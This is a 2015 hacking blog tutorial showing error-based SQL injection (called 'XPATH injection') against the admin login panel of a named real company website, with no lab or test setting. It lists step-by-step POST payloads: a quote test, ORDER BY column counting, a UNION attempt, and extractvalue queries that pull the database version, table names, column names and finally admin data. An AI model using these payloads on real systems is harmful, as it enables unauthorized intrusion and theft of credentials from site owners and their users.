Social Icons

Friday, 17 July 2015

XPATH Injection in Login Panel

XPATH Injection in Login Panel
In Our Previous Tutorial we have Discuss about Bypassing Login Panel With SQL Queries
But some Times when we Found SQL injection Vulnerability In Login Panel And after Executing SQL Queries There, it doesn't Give Access To the login Panel.So in SUCH cases we Will Inject The Login Panel With XPATH injection and dump admin Details from Login Panel.

So we Will Start our Manually SQL Injection.as we are injecting through POST Parameters so we need LIVE HTTP HEADERS Addon for Executing Post Parameters In Login Panel.
Here is The Target site:

http://www.almoayedgroup.com/admin

Now open LIVE HTTP HEADERS in Mozilla Firefox .As You Can See there are username and password Boxes in Admin Login Panel.Insert Some Text there and Click On Log In Button.


XPATH Injection in Login Panel

 After Clicking On the Log In Button, Now search the Post Parameters in Live HTTP HEADERS.Here are our Post Request that we have sent to the server.
XPATH Injection in Login Panel

From The Above Picture You Can See these are our Post Request Parameters
POST REQUEST:user_id=raijee&password=12345&submit=Sign+In
Now let's Add Single Quote ' after user_id=raijee' to check if the Login Panel is Vulnerable to SQL Injection.After Adding The Single Quote ' in Our Query Let's Send A POST Request to The Server And Click on REPLY Button.
So After sending the POST Request to The Server it gives SQL Error !!


XPATH Injection in Login Panel
it Means it's Vulnerable to SQL Injection.Let's count The columns for Preparing Our UNION BASED command.so now we will Give our POST Request to the Server for Counting the number of Columns there.
So this one is Our POST Parameter Now Add Order By Command For Counting columns:
POST REQUEST:user_id=raijee' order by 2%23&password=12345&submit=Sign+In
it Gives No any Error !!

POST REQUEST:user_id=raijee' order by 5%23&password=12345&submit=Sign+In
Again No Error !!

POST REQUEST:user_id=raijee' order by 6%23&password=12345&submit=Sign+In
 Here we Got Error !!


XPATH Injection in Login Panel

Error:Invalid query:Unknown column '6' in 'order clause'
so it mean there are 5 Total Columns. Now Let's Prepare our UNION BASED command and Send a POST Request to the Server:
 

POST REQUEST:user_id=raijee' and 0 union select 1,2,3,4,5%23&password=12345&submit=Sign+In
But It doesn't Give us Any Output There.So now Let's Try XPATH Injection for injecting it.
So This is our XPATH query for version.You Can use XPATH with Extractvalue or UpdateXML. 
Let's Send a Post Request for getting the VERSION With XPATH Injection by Extractvalue .


POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,version()))%23&password=12345&submit=Sign+In
Here we Got The VERSION.
XPATH Injection in Login Panel



Invalid query:XPATH syntax error: ':5.5.32-log'
So now next we Have To Get the Tables from the Database.Here is The Query for Tables and Send a Post Request.
POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))%23&password=12345&submit=Sign+In

Increase the  LIMIT for other Tables.After Getting the Tables Next part is to Getting the columns from The Tables.So This one is our Query:

POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name='TABLE_NAME_HERE' limit 0,1)))%23&password=12345&submit=Sign+In


 After Getting The Columns From the Tables Now Final Part is Dump Data from the Columns.
So This one is FINAL QUERY:

POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(COLUMN_NAME_HERE) from TABLE_NAME_HERE)))%23&password=12345&submit=Sign+In

If you have not Read Tutorials About XPATH Injection then First Go And Read 
XPATH Injection Using Extractvalue

XPATH Injection Using UpdateXML

AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee

2 comments: